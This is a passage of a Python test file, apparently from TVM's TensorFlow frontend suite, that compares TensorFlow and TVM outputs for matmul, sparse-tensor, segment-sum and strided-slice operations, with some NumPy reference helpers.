#######################################################################
# MatMul, BatchMatMul, BatchMatMulV2
# ----------------------------------
def _test_matmul(i, j, k, dtype, outer=None):
"""One iteration of matmul"""
A_shape_init = [i, j]
B_shape_init = [j, k]
for transpose_a in [False, True]:
for transpose_b in [False, True]:
outer = outer or []
A_shape = outer + (A_shape_init[::-1] if transpose_a else A_shape_init)
B_shape = outer + (B_shape_init[::-1] if transpose_b else B_shape_init)
with tf.Graph().as_default():
A = tf.placeholder(shape=A_shape, dtype=dtype, name="A")
B = tf.placeholder(shape=B_shape, dtype=dtype, name="B")
result = tf.matmul(A, B, transpose_a=transpose_a, transpose_b=transpose_b)
A_np = np.random.uniform(high=5.0, size=A_shape).astype(dtype)
B_np = np.random.uniform(high=5.0, size=B_shape).astype(dtype)
compare_tf_with_tvm(
[A_np, B_np], [A.name, B.name], result.name, convert_config={"use_dense": True}
)
compare_tf_with_tvm(
[A_np, B_np], [A.name, B.name], result.name, convert_config={"use_dense": False}
)
def test_forward_matmul():
"""MatMul op test"""
_test_matmul(1, 3, 6, "int32")
_test_matmul(5, 3, 1, "float64")
def _test_batch_matmul(A_shape, B_shape, dtype, adjoint_a=False, adjoint_b=False):
with tf.Graph().as_default():
A = tf.placeholder(shape=A_shape, dtype=dtype, name="A")
B = tf.placeholder(shape=B_shape, dtype=dtype, name="B")
result = tf.matmul(A, B, adjoint_a=adjoint_a, adjoint_b=adjoint_b, name="batchmatmul")
A_np = np.random.uniform(high=5.0, size=A_shape).astype(dtype)
B_np = np.random.uniform(high=5.0, size=B_shape).astype(dtype)
compare_tf_with_tvm(
[A_np, B_np],
[A.name, B.name],
result.name,
convert_config={"use_nt_batch_matmul": True},
)
compare_tf_with_tvm(
[A_np, B_np],
[A.name, B.name],
result.name,
convert_config={"use_nt_batch_matmul": False},
)
def _test_batch_matmul_dynamic(
A_shape, B_shape, A_np_shape, B_np_shape, dtype, adjoint_a=False, adjoint_b=False
):
with tf.Graph().as_default():
A = tf.placeholder(shape=A_shape, dtype=dtype, name="A")
B = tf.placeholder(shape=B_shape, dtype=dtype, name="B")
result = tf.matmul(A, B, adjoint_a=adjoint_a, adjoint_b=adjoint_b, name="batchmatmul")
A_np = np.random.uniform(high=5.0, size=A_np_shape).astype(dtype)
B_np = np.random.uniform(high=5.0, size=B_np_shape).astype(dtype)
        # For now, only the llvm and cublas implementations in TOPI support dynamic shape.
        # TODO: add dynamic shape support for more backends in TOPI.
compare_tf_with_tvm(
[A_np, B_np],
[A.name, B.name],
result.name,
mode="vm",
targets=["llvm", "cuda -libs=cublas"],
convert_config={"use_nt_batch_matmul": True},
)
compare_tf_with_tvm(
[A_np, B_np],
[A.name, B.name],
result.name,
mode="vm",
targets=["llvm", "cuda -libs=cublas"],
convert_config={"use_nt_batch_matmul": False},
)
def test_forward_batch_matmul():
"""TF op BatchMatMul, BatchMatMulV2 test"""
_test_batch_matmul((3, 5, 4), (3, 4, 5), "int32")
_test_batch_matmul((3, 5, 4), (3, 4, 5), "float32", True, True)
_test_batch_matmul((3, 5, 4), (3, 5, 4), "int32", True, False)
_test_batch_matmul((3, 5, 4), (3, 5, 4), "float32", False, True)
_test_batch_matmul((2, 3, 4, 5, 6), (2, 3, 4, 6, 5), "int32")
_test_batch_matmul((1, 2, 3, 4, 5, 6), (1, 2, 3, 4, 6, 5), "float32", True, True)
_test_batch_matmul((3, 4, 5, 6), (3, 4, 5, 6), "int32", True, False)
_test_batch_matmul((2, 3, 4, 2, 3, 4, 5, 6), (2, 3, 4, 2, 3, 4, 5, 6), "float32", False, True)
_test_batch_matmul((1, 8, 64, 2), (2, 1), "float32", False, False)
_test_batch_matmul((1, 8, 8, 64), (64, 1), "float32", False, False)
_test_batch_matmul((1, 8, 64), (64, 1), "float32", False, False)
def test_forward_batch_matmul_dynamic():
_test_batch_matmul_dynamic((None, 5, 4), (None, 4, 5), (3, 5, 4), (3, 4, 5), "int32")
_test_batch_matmul_dynamic(
(None, 5, 4), (None, 4, 5), (3, 5, 4), (3, 4, 5), "float32", True, True
)
_test_batch_matmul_dynamic(
(None, 5, 4), (None, 5, 4), (3, 5, 4), (3, 5, 4), "int32", True, False
)
_test_batch_matmul_dynamic(
(None, 5, 4), (None, 5, 4), (3, 5, 4), (3, 5, 4), "float32", False, True
)
_test_batch_matmul_dynamic(
(None, 4, 5, 6), (None, 4, 6, 5), (3, 4, 5, 6), (3, 4, 6, 5), "float32"
)
_test_batch_matmul_dynamic(
(None, None, 5, 6), (None, None, 6, 5), (3, 4, 5, 6), (3, 4, 6, 5), "float32"
)
_test_batch_matmul_dynamic(
(None, None, None, 5, 6),
(None, None, None, 6, 5),
(2, 3, 4, 5, 6),
(2, 3, 4, 6, 5),
"float32",
)
_test_batch_matmul_dynamic(
(None, None, None, 5, 6),
(6, None),
(2, 3, 4, 5, 6),
(6, 1),
"float32",
)
_test_batch_matmul_dynamic(
(None, 5, 6),
(6, None),
(24, 5, 6),
(6, 1),
"float32",
)
#######################################################################
# SparseTensorDenseMatMul
# ----------------------------------
def _test_sparse_dense_matmul(indices, values, A_inp_shape, B_inp_shape, dtype, flip=False):
"""One iteration of sparse_dense_matmul"""
for adjoint_a in [False, True]:
for adjoint_b in [False, True]:
A_shape = A_inp_shape[::-1] if adjoint_a else A_inp_shape
B_shape = B_inp_shape[::-1] if adjoint_b else B_inp_shape
with tf.Graph().as_default():
A_sp = tf.sparse.SparseTensor(indices=indices, values=values, dense_shape=A_shape)
B = tf.placeholder(shape=B_shape, dtype=dtype, name="B")
if flip:
result = tf.sparse.sparse_dense_matmul(
B, A_sp, adjoint_a=adjoint_b, adjoint_b=adjoint_a
)
else:
result = tf.sparse.sparse_dense_matmul(
A_sp, B, adjoint_a=adjoint_a, adjoint_b=adjoint_b
)
B_np = np.random.uniform(high=5.0, size=B_shape).astype(dtype)
compare_tf_with_tvm([B_np], [B.name], result.name)
def test_forward_sparse_dense_matmul():
"""sparse_dense_matmul op test"""
    ###################################################################
    #
    # Creating a SparseTensor requires three inputs, for example:
    #   SparseTensor(indices=[[0, 0], [1, 2]], values=[1, 2], dense_shape=[3, 4])
    #
    # The sparse tensor above corresponds to the dense matrix:
    #   [[1, 0, 0, 0]
    #    [0, 0, 2, 0]
    #    [0, 0, 0, 0]]
    #
    # (A NumPy sketch of the dense equivalent follows this test function.)
    # ------------------------------------------------------------------
_test_sparse_dense_matmul([[0, 0], [1, 2]], [4.0, 8.0], [3, 4], [4, 3], "float32")
_test_sparse_dense_matmul([[0, 0], [1, 2]], [4.0, 8.0], [3, 3], [3, 3], "float32")
_test_sparse_dense_matmul([[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [5, 5], [5, 5], "float32")
_test_sparse_dense_matmul([[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [7, 9], [9, 5], "float32")
_test_sparse_dense_matmul([[0, 0], [1, 2]], [4.0, 8.0], [4, 3], [3, 4], "float32", True)
_test_sparse_dense_matmul([[0, 0], [1, 2]], [4.0, 8.0], [3, 3], [3, 3], "float32", True)
_test_sparse_dense_matmul(
[[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [5, 5], [5, 5], "float32", True
)
_test_sparse_dense_matmul(
[[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [9, 5], [7, 9], "float32", True
)
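# A minimal NumPy sketch (illustrative only, never called by the tests above): it
# rebuilds the dense matrix from the three SparseTensor components and applies a
# plain dense matmul, which is the result SparseTensorDenseMatMul is expected to
# reproduce. It assumes the module-level numpy import (np); the helper name is
# made up for this sketch.
def _sparse_dense_matmul_reference(indices, values, dense_shape, dense_rhs):
    """Dense reference for sparse(A) @ B with A given in COO form."""
    lhs = np.zeros(dense_shape, dtype=dense_rhs.dtype)
    for (row, col), val in zip(indices, values):
        lhs[row, col] = val
    return lhs @ dense_rhs
# Example: the [3, 4] sparse matrix from the comment above times a dense [4, 3] matrix:
#   _sparse_dense_matmul_reference([[0, 0], [1, 2]], [4.0, 8.0], [3, 4], np.ones((4, 3), "float32"))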
#######################################################################
# SparseFillEmptyRows
# ------------
def _test_sparse_fill_empty_rows(indices_np, values_np, dense_shape_np, default_value_int, use_dyn):
with tf.Graph().as_default():
if use_dyn:
indices = tf.placeholder(shape=(None, None), dtype=indices_np.dtype, name="indices")
values = tf.placeholder(shape=(None), dtype=values_np.dtype, name="values")
dense_shape = tf.placeholder(
shape=(None), dtype=dense_shape_np.dtype, name="dense_shape"
)
else:
indices = tf.placeholder(shape=indices_np.shape, dtype=indices_np.dtype, name="indices")
values = tf.placeholder(shape=values_np.shape, dtype=values_np.dtype, name="values")
dense_shape = tf.placeholder(
shape=dense_shape_np.shape, dtype=dense_shape_np.dtype, name="dense_shape"
)
default_value = tf.placeholder(shape=(), dtype=values_np.dtype, name="default_value")
sp_input = tf.sparse.SparseTensor(indices=indices, values=values, dense_shape=dense_shape)
_ = tf.sparse.fill_empty_rows(sp_input, default_value, name="sparse_fill_empty_rows")
compare_tf_with_tvm(
[indices_np, values_np, dense_shape_np, default_value_int],
[indices.name, values.name, dense_shape.name, default_value.name],
[
"sparse_fill_empty_rows/SparseFillEmptyRows:0",
"sparse_fill_empty_rows/SparseFillEmptyRows:1",
"sparse_fill_empty_rows/SparseFillEmptyRows:2",
],
mode="vm",
)
@pytest.mark.parametrize(
"sparse_indices_np, sparse_values_np, dense_shape_np, default_value_int",
[
(
np.array([[1, 1], [0, 3], [0, 1], [2, 0], [3, 1]], dtype=np.int64),
np.array([1, 2, 3, 4, 5], dtype=np.int64),
np.array([5, 6], dtype=np.int64),
10,
),
(
np.array([[1, 1], [0, 3], [2, 0], [3, 1]], dtype=np.int64),
np.array([1, 2, 3, 4], dtype=np.int64),
np.array([5, 6], dtype=np.int64),
10,
),
(
np.array([[0, 1], [0, 3], [2, 0], [3, 1]], dtype=np.int64),
np.array([1, 2, 3, 4], dtype=np.int64),
np.array([5, 6], dtype=np.int64),
10,
),
(
np.array([[1, 1, 1], [1, 3, 1], [2, 0, 5], [3, 1, 6]], dtype=np.int64),
np.array([1, 2, 3, 4], dtype=np.int64),
np.array([7, 7, 7], dtype=np.int64),
5,
),
(
np.array([[1], [2]], dtype=np.int64),
np.array([7, 8], dtype=np.int64),
np.array([5], dtype=np.int64),
4,
),
(
np.ones((0, 1), dtype=np.int64),
np.array([], dtype=np.int64),
np.array([5], dtype=np.int64),
4,
),
(
np.ones((0, 3), dtype=np.int64),
np.array([], dtype=np.int64),
np.array([9, 3, 7], dtype=np.int64),
100,
),
],
)
@pytest.mark.parametrize("use_dyn", [True, False])
def test_forward_sparse_fill_empty_rows(
sparse_indices_np, sparse_values_np, dense_shape_np, default_value_int, use_dyn
):
"""sparse_fill_empty_rows op test"""
    ###################################################################
    #
    # Creating a SparseTensor requires three inputs, for example:
    #   SparseTensor(indices=[[0, 0], [1, 2]], values=[1, 2], dense_shape=[3, 4])
    #
    # The sparse tensor above corresponds to the dense matrix:
    #   [[1, 0, 0, 0]
    #    [0, 0, 2, 0]
    #    [0, 0, 0, 0]]
    #
    # (A NumPy reference sketch of SparseFillEmptyRows follows this test function.)
    # ------------------------------------------------------------------
_test_sparse_fill_empty_rows(
sparse_indices_np, sparse_values_np, dense_shape_np, default_value_int, use_dyn
)
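# A reference sketch of SparseFillEmptyRows (illustrative only, never called by
# the tests above): every index of dimension 0 without an entry receives a single
# entry at [row, 0, ...] holding default_value, and a boolean indicator marks
# which rows were empty. Existing entries keep their input order within a row in
# this sketch. It assumes the module-level numpy import (np); the helper name is
# made up for this sketch.
def _sparse_fill_empty_rows_reference(indices, values, dense_shape, default_value):
    ndim = len(dense_shape)
    by_row = {}
    for idx, val in zip(indices, values):
        by_row.setdefault(int(idx[0]), []).append((list(idx), val))
    out_indices, out_values, empty_row_indicator = [], [], []
    for row in range(int(dense_shape[0])):
        if row in by_row:
            for idx, val in by_row[row]:
                out_indices.append(idx)
                out_values.append(val)
            empty_row_indicator.append(False)
        else:
            out_indices.append([row] + [0] * (ndim - 1))
            out_values.append(default_value)
            empty_row_indicator.append(True)
    return np.array(out_indices), np.array(out_values), np.array(empty_row_indicator)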
#######################################################################
# SparseReshape
# ------------
def _test_sparse_reshape(indices_np, values_np, prev_shape_np, new_shape_np, use_dyn=False):
with tf.Graph().as_default():
if use_dyn:
indices = tf.placeholder(shape=(None, None), dtype=indices_np.dtype, name="indices")
values = tf.placeholder(shape=(None), dtype=values_np.dtype, name="values")
prev_shape = tf.placeholder(shape=(None), dtype=prev_shape_np.dtype, name="prev_shape")
new_shape = tf.placeholder(shape=(None), dtype=new_shape_np.dtype, name="new_shape")
else:
indices = tf.placeholder(shape=indices_np.shape, dtype=indices_np.dtype, name="indices")
values = tf.placeholder(shape=values_np.shape, dtype=values_np.dtype, name="values")
prev_shape = tf.placeholder(
shape=prev_shape_np.shape, dtype=prev_shape_np.dtype, name="prev_shape"
)
new_shape = tf.placeholder(
shape=new_shape_np.shape, dtype=new_shape_np.dtype, name="new_shape"
)
sp_input = tf.sparse.SparseTensor(indices=indices, values=values, dense_shape=prev_shape)
_ = tf.sparse.reshape(sp_input, new_shape, name="sparse_reshape")
compare_tf_with_tvm(
[indices_np, values_np, prev_shape_np, new_shape_np],
[indices.name, values.name, prev_shape.name, new_shape.name],
["sparse_reshape:0", "sparse_reshape:1", "sparse_reshape/Identity:0"],
mode="vm",
)
@pytest.mark.parametrize(
"sparse_indices_np, sparse_values_np, prev_shape_np, new_shape_np",
[
(
np.ones((0, 1), dtype=np.int64),
np.array([], dtype=np.int64),
np.array([4], dtype=np.int64),
np.array([2, -1], dtype=np.int64),
),
(
np.ones((0, 1), dtype=np.int64),
np.array([], dtype=np.int64),
np.array([4], dtype=np.int64),
np.array([2, 2], dtype=np.int64),
),
(
np.ones((0, 2), dtype=np.int64),
np.array([], dtype=np.int64),
np.array([3, 6], dtype=np.int64),
np.array([-1, 2], dtype=np.int64),
),
(
np.array([[0, 0, 0], [0, 0, 1], [0, 1, 0], [1, 0, 0], [1, 2, 3]], dtype=np.int64),
np.array([7, 5, 6, 3, 9], dtype=np.int64),
np.array([2, 3, 6], dtype=np.int64),
np.array([-1, 9], dtype=np.int64),
),
(
np.array(
[
[0, 0, 0, 0, 0],
[0, 0, 1, 2, 3],
[0, 1, 0, 3, 5],
[1, 0, 0, 4, 6],
[1, 2, 3, 6, 8],
],
dtype=np.int64,
),
np.array([7, 5, 6, 3, 9], dtype=np.int64),
np.array([2, 3, 6, 7, 9], dtype=np.int64),
np.array([9, -1, 7], dtype=np.int64),
),
(
np.array([[0, 0], [0, 1], [3, 4], [4, 3], [7, 3]], dtype=np.int64),
np.array([7, 5, 6, 3, 9], dtype=np.int64),
np.array([9, 4], dtype=np.int64),
np.array([-1], dtype=np.int64),
),
(
np.array([[0], [5], [10], [20], [24]], dtype=np.int64),
np.array([7, 5, 6, 3, 9], dtype=np.int64),
np.array([25], dtype=np.int64),
np.array([5, 5], dtype=np.int64),
),
(
np.array([[0, 100], [200, 100], [300, 400], [50, 20], [400, 50]], dtype=np.int64),
np.array([7, 5, 6, 3, 9], dtype=np.int64),
np.array([500, 20], dtype=np.int64),
np.array([500, 20], dtype=np.int64),
),
(
np.array([[0, 100], [200, 100], [300, 400], [50, 20], [400, 50]], dtype=np.int64),
np.array([7, 5, 6, 3, 9], dtype=np.int64),
np.array([500, 20], dtype=np.int64),
np.array([500, -1], dtype=np.int64),
),
(
np.array([[0, 100], [200, 100], [300, 400], [50, 20], [400, 50]], dtype=np.int64),
np.array([7, 5, 6, 3, 9], dtype=np.int64),
np.array([500, 20], dtype=np.int64),
np.array([250, 40], dtype=np.int64),
),
],
)
@pytest.mark.parametrize("use_dyn", [True, False])
def test_forward_sparse_reshape(
sparse_indices_np, sparse_values_np, prev_shape_np, new_shape_np, use_dyn
):
"""sparse_reshape op test"""
    ###################################################################
    #
    # Creating a SparseTensor requires three inputs, for example:
    #   SparseTensor(indices=[[0, 0], [1, 2]], values=[1, 2], dense_shape=[3, 4])
    #
    # The sparse tensor above corresponds to the dense matrix:
    #   [[1, 0, 0, 0]
    #    [0, 0, 2, 0]
    #    [0, 0, 0, 0]]
    #
    # (A NumPy reference sketch of SparseReshape follows this test function.)
    # ------------------------------------------------------------------
_test_sparse_reshape(sparse_indices_np, sparse_values_np, prev_shape_np, new_shape_np, use_dyn)
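# A reference sketch of SparseReshape (illustrative only, never called by the
# tests above): a single -1 in new_shape is inferred from the element count,
# then every index is re-expressed by flattening against prev_shape and
# unflattening against the resolved new shape; values are untouched. It assumes
# the module-level numpy import (np); the helper name is made up for this sketch.
def _sparse_reshape_reference(indices, prev_shape, new_shape):
    prev_shape = np.asarray(prev_shape, dtype="int64")
    new_shape = np.array(new_shape, dtype="int64")
    if (new_shape == -1).any():
        known = int(np.prod(new_shape[new_shape != -1]))
        new_shape[new_shape == -1] = int(np.prod(prev_shape)) // known
    indices = np.asarray(indices, dtype="int64")
    if indices.shape[0] == 0:
        return np.zeros((0, len(new_shape)), dtype="int64"), new_shape
    flat = np.ravel_multi_index(indices.T, prev_shape)
    new_indices = np.stack(np.unravel_index(flat, new_shape), axis=1)
    return new_indices, new_shape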
#######################################################################
# Sparse Segment Variants
# ------------
def _test_sparse_segment_variant(
tf_op, data_np, indices_np, segment_ids_np, num_segments, use_dyn=False
):
with tf.Graph().as_default():
if use_dyn:
data = tf.placeholder(
shape=[None for _ in data_np.shape], dtype=data_np.dtype, name="data"
)
indices = tf.placeholder(shape=[None], dtype=indices_np.dtype, name="indices")
segment_ids = tf.placeholder(
shape=(None), dtype=segment_ids_np.dtype, name="segment_ids"
)
else:
data = tf.placeholder(shape=data_np.shape, dtype=data_np.dtype, name="data")
indices = tf.placeholder(shape=indices_np.shape, dtype=indices_np.dtype, name="indices")
segment_ids = tf.placeholder(
shape=segment_ids_np.shape, dtype=segment_ids_np.dtype, name="segment_ids"
)
_ = tf_op(
data, indices, segment_ids, num_segments=num_segments, name="sparse_segment_variant"
)
compare_tf_with_tvm(
[data_np, indices_np, segment_ids_np],
[data.name, indices.name, segment_ids.name],
["sparse_segment_variant:0"],
mode="vm",
)
@pytest.mark.parametrize(
"data_np, indices_np, segment_ids_np, num_segments",
[
(
np.array([5, 1, 7, 2, 3, 4], dtype=np.float32),
np.array([0, 3, 4], dtype=np.int32),
np.array([0, 1, 1], dtype=np.int32),
None,
),
(
np.array([[1, 2, 3, 4], [-1, -2, -3, -4], [5, 6, 7, 8]], dtype=np.float64),
np.array([0, 1], dtype=np.int32),
np.array([0, 2], dtype=np.int32),
4,
),
(
np.random.random((6, 4, 5)),
np.array([0, 2, 4, 3, 1], dtype=np.int32),
np.array([0, 0, 1, 5, 5], dtype=np.int32),
100,
),
(
np.random.random((6, 4, 5)),
np.array([0, 2, 4, 3, 1], dtype=np.int32),
np.array([0, 0, 1, 5, 5], dtype=np.int32),
None,
),
(
np.array([[[1, 7]], [[3, 8]], [[2, 9]]], dtype=np.float64),
np.array([0, 1, 2], dtype=np.int32),
np.array([0, 0, 1], dtype=np.int32),
None,
),
(
np.random.random((9, 4, 5, 7)),
np.array([0, 1, 2, 3, 4, 5, 6, 7, 8], dtype=np.int32),
np.array([0, 0, 1, 3, 5, 6, 7, 7, 8], dtype=np.int32),
9,
),
(
np.random.random((9, 4, 5, 7)),
np.array([0, 1, 2, 3, 4, 5, 6, 7, 8], dtype=np.int32),
np.array([0, 0, 1, 3, 5, 6, 7, 7, 8], dtype=np.int32),
None,
),
(
np.array([[1, 2, 3, 4], [-1, -2, -3, -4], [5, 6, 7, 8]], dtype=np.float64),
np.array([0, 1], dtype=np.int32),
np.array([0, 2], dtype=np.int32),
None,
),
(
np.random.random((9, 4, 5, 7)),
np.array([0, 1, 2, 3, 4, 5, 6, 7, 8], dtype=np.int32),
np.array([0, 0, 1, 3, 5, 5, 5, 5, 5], dtype=np.int32),
6,
),
],
)
@pytest.mark.parametrize("use_dyn", [True, False])
@pytest.mark.parametrize(
"tf_op",
[
tf.sparse.segment_sum,
tf.sparse.segment_sqrt_n,
tf.sparse.segment_mean,
],
)
def test_forward_sparse_segment_sum_variants(
tf_op,
data_np,
indices_np,
segment_ids_np,
num_segments,
use_dyn,
):
"""sparse segment sum variants tests"""
_test_sparse_segment_variant(tf_op, data_np, indices_np, segment_ids_np, num_segments, use_dyn)
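# A reference sketch of tf.sparse.segment_sum (illustrative only, never called
# by the tests above): rows of `data` selected by `indices` are accumulated into
# the output row given by the matching entry of `segment_ids`; segment_mean and
# segment_sqrt_n only differ in the per-segment normalisation applied afterwards.
# It assumes the module-level numpy import (np); the helper name is made up for
# this sketch.
def _sparse_segment_sum_reference(data, indices, segment_ids, num_segments=None):
    n_seg = int(num_segments) if num_segments is not None else int(np.max(segment_ids)) + 1
    out = np.zeros((n_seg,) + data.shape[1:], dtype=data.dtype)
    for idx, seg in zip(indices, segment_ids):
        out[int(seg)] += data[int(idx)]
    return out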
#######################################################################
# Math SegmentSum
# ------------
def _test_math_segment_sum(data_np, segment_ids_np, use_dyn=False):
with tf.Graph().as_default():
if use_dyn:
data = tf.placeholder(
shape=[None for _ in data_np.shape], dtype=data_np.dtype, name="data"
)
segment_ids = tf.placeholder(
shape=(None), dtype=segment_ids_np.dtype, name="segment_ids"
)
else:
data = tf.placeholder(shape=data_np.shape, dtype=data_np.dtype, name="data")
segment_ids = tf.placeholder(
shape=segment_ids_np.shape, dtype=segment_ids_np.dtype, name="segment_ids"
)
_ = tf.math.segment_sum(data, segment_ids, name="segment_sum")
compare_tf_with_tvm(
[data_np, segment_ids_np],
[data.name, segment_ids.name],
["segment_sum:0"],
mode="vm",
)
@pytest.mark.parametrize(
"data_np, segment_ids_np",
[
(
np.array([5, 1, 7, 2, 3, 4], dtype=np.float32),
np.array([0, 0, 0, 1, 1, 1], dtype=np.int32),
),
(
np.array([[1, 2, 3, 4], [-1, -2, -3, -4], [5, 6, 7, 8]], dtype=np.float64),
np.array([0, 0, 1], dtype=np.int32),
),
(
np.random.random((6, 4, 5)),
np.array([0, 0, 1, 2, 2, 3], dtype=np.int64),
),
(
np.array([[[1, 7]], [[3, 8]], [[2, 9]]], dtype=np.float32),
np.array([0, 0, 1], dtype=np.int32),
),
(
np.random.random((9, 4, 5, 7)),
np.array([0, 0, 0, 1, 2, 3, 4, 4, 5], dtype=np.int64),
),
],
)
@pytest.mark.parametrize("use_dyn", [True, False])
def test_forward_math_segment_sum(data_np, segment_ids_np, use_dyn):
"""math segment sum test"""
_test_math_segment_sum(data_np, segment_ids_np, use_dyn)
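# A reference sketch of tf.math.segment_sum (illustrative only, never called by
# the tests above): with sorted segment_ids, output row i is the sum of all data
# rows whose segment id equals i. It assumes the module-level numpy import (np);
# the helper name is made up for this sketch.
def _segment_sum_reference(data, segment_ids):
    out = np.zeros((int(np.max(segment_ids)) + 1,) + data.shape[1:], dtype=data.dtype)
    np.add.at(out, segment_ids, data)  # unbuffered scatter-add over the first axis
    return out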
# tensorflow.compat.v1.sparse_to_dense
# ---------------
def _test_sparse_to_dense(sparse_indices, sparse_values, default_value, output_shape):
with tf.Graph().as_default():
indices = tf.placeholder(
shape=sparse_indices.shape, dtype=str(sparse_indices.dtype), name="indices"
)
values = tf.placeholder(
shape=sparse_values.shape, dtype=str(sparse_values.dtype), name="values"
)
oshape = tf.constant(output_shape, shape=output_shape.shape, dtype=str(output_shape.dtype))
# Output shape depends on a dynamic input, use VM.
        if default_value is None:
output = tf.sparse_to_dense(indices, oshape, values)
compare_tf_with_tvm(
[sparse_indices, sparse_values], ["indices:0", "values:0"], output.name, mode="vm"
)
else:
dv = tf.placeholder(shape=(), dtype=str(default_value.dtype), name="default_value")
output = tf.sparse_to_dense(indices, oshape, values, dv)
compare_tf_with_tvm(
[sparse_indices, sparse_values, default_value],
["indices:0", "values:0", "default_value:0"],
output.name,
mode="vm",
)
def test_forward_sparse_to_dense():
# scalar
_test_sparse_to_dense(
sparse_indices=np.int32(1),
sparse_values=np.int32(3),
default_value=np.int32(0),
output_shape=np.array([5]).astype("int32"),
)
# vector
_test_sparse_to_dense(
sparse_indices=np.array([0, 1, 4]).astype("int32"),
sparse_values=np.array([3, 3, 3]).astype("int32"),
default_value=np.int32(0),
output_shape=np.array([5]).astype("int32"),
)
# vector nXd
_test_sparse_to_dense(
sparse_indices=np.array([[0, 0], [1, 2]]).astype("int32"),
sparse_values=np.array([1, 2]).astype("int32"),
default_value=np.int32(0),
output_shape=np.array([3, 4]).astype("int32"),
)
_test_sparse_to_dense(
sparse_indices=np.array([[0, 0, 0], [1, 2, 3]]).astype("int32"),
sparse_values=np.array([1, 2]).astype("int32"),
default_value=np.int32(4),
output_shape=np.array([2, 3, 4]).astype("int32"),
)
# floats
_test_sparse_to_dense(
sparse_indices=np.array([0, 1, 4]).astype("int32"),
sparse_values=np.array([3.1, 3.1, 3.1]).astype("float32"),
default_value=np.float32(3.5),
output_shape=np.array([5]).astype("int32"),
)
# default value not specified
_test_sparse_to_dense(
sparse_indices=np.array([0, 1, 4]).astype("int32"),
sparse_values=np.array([3.1, 3.1, 3.1]).astype("float32"),
default_value=None,
output_shape=np.array([5]).astype("int32"),
)
#######################################################################
# tensorflow.sparse.to_dense
# ---------------
def _test_sparse_to_dense_v2(indices, values, A_shape, dtype, default_value=None):
with tf.Graph().as_default():
A_sp = tf.sparse.SparseTensor(indices=indices, values=values, dense_shape=A_shape)
result = tf.sparse.to_dense(A_sp, default_value=default_value)
# The output shape depends on a dynamic input, use VM.
compare_tf_with_tvm([], [], result.name, mode="vm")
def test_forward_sparse_to_dense_v2():
_test_sparse_to_dense_v2([[1]], [3.0], [5], "float32")
_test_sparse_to_dense_v2([[1]], [3.0], [5], "float32", 0.3)
_test_sparse_to_dense_v2([[0, 0], [1, 2]], [4.0, 8.0], [3, 4], "float32")
_test_sparse_to_dense_v2([[0, 0], [1, 2]], [4.0, 8.0], [3, 4], "float32", 1.3)
_test_sparse_to_dense_v2([[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [5, 5], "float32")
_test_sparse_to_dense_v2([[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [5, 5], "float32", 1.9)
#######################################################################
# tensorflow.sparse.add
# ----------------------------------
def _test_sparse_add(indices, values, A_shape, B_shape, dtype, flip=False):
"""One iteration of tf.sparse.add"""
# TODO(ANSHUMAN87): support cuda
# TODO(ANSHUMAN87): support both sparse input case
with tf.Graph().as_default():
A_sp = tf.sparse.SparseTensor(
indices=indices, values=np.array(values).astype(dtype), dense_shape=A_shape
)
B = tf.placeholder(shape=B_shape, dtype=dtype, name="B")
        # TODO(ANSHUMAN87): support user-provided threshold values
if flip:
if package_version.parse(tf.VERSION) < package_version.parse("1.13.0"):
result = tf.sparse.add(B, A_sp, thresh=0)
else:
result = tf.sparse.add(B, A_sp, threshold=0)
else:
if package_version.parse(tf.VERSION) < package_version.parse("1.13.0"):
result = tf.sparse.add(A_sp, B, thresh=0)
else:
result = tf.sparse.add(A_sp, B, threshold=0)
B_np = np.random.uniform(high=5.0, size=B_shape).astype(dtype)
compare_tf_with_tvm([B_np], [B.name], result.name, no_gpu=True)
def test_sparse_add():
"""sparse.add op test"""
    ###################################################################
    #
    # Creating a SparseTensor requires three inputs, for example:
    #   SparseTensor(indices=[[0, 0], [1, 2]], values=[1, 2], dense_shape=[3, 4])
    #
    # The sparse tensor above corresponds to the dense matrix:
    #   [[1, 0, 0, 0]
    #    [0, 0, 2, 0]
    #    [0, 0, 0, 0]]
    #
    # ------------------------------------------------------------------
for dtype_inp in ["float32", "float64", "int32"]:
_test_sparse_add([[0, 0], [1, 2]], [4.0, 8.0], [3, 4], [3, 4], dtype_inp)
_test_sparse_add([[0, 0], [1, 2]], [4.0, 8.0], [3, 4], [3, 4], dtype_inp, True)
_test_sparse_add([[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [5, 5], [5, 5], dtype_inp)
_test_sparse_add([[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [5, 5], [5, 5], dtype_inp, True)
#######################################################################
# StridedSlice
# ------------
def _test_stridedslice(
ip_shape,
begin,
end,
stride,
dtype,
begin_mask=0,
end_mask=0,
new_axis_mask=0,
shrink_axis_mask=0,
ellipsis_mask=0,
):
"""One iteration of a Stridedslice"""
tf.reset_default_graph()
np_data = np.random.uniform(size=ip_shape).astype(dtype)
with tf.Graph().as_default():
if len(ip_shape) == 0:
in_data = tf.constant(np_data, dtype)
else:
in_data = tf.placeholder(dtype, ip_shape, name="in_data")
tf.strided_slice(
in_data,
begin,
end,
stride,
begin_mask=begin_mask,
end_mask=end_mask,
new_axis_mask=new_axis_mask,
shrink_axis_mask=shrink_axis_mask,
ellipsis_mask=ellipsis_mask,
name="strided_slice",
)
if len(ip_shape) == 0:
compare_tf_with_tvm(None, "", "strided_slice:0")
else:
compare_tf_with_tvm(np_data, "in_data:0", "strided_slice:0")
def test_forward_stridedslice():
"""test StridedSlice"""
_test_stridedslice([], [0], [0], [1], "float32", new_axis_mask=1)
_test_stridedslice([2], [1], [1], [1], "float32", shrink_axis_mask=1)
_test_stridedslice([4], [-1], [0], [1], "float32", shrink_axis_mask=1)
_test_stridedslice([2, 1], [0], [1], [1], "float32", shrink_axis_mask=1)
_test_stridedslice([2, 3, 4], [-2], [0], [1], "float32", shrink_axis_mask=8)
_test_stridedslice([2, 3, 4], [0], [1], [1], "float32", shrink_axis_mask=8)
_test_stridedslice([3, 4, 3], [1, -1, 0], [4, -5, 3], [2, -1, 1], "float32")
_test_stridedslice([3, 4, 3], [1, 0], [4, 3], [2, 1], "float32", ellipsis_mask=8)
_test_stridedslice([3, 4, 3], [1, 0], [4, 2], [2, 1], "float32", ellipsis_mask=2)
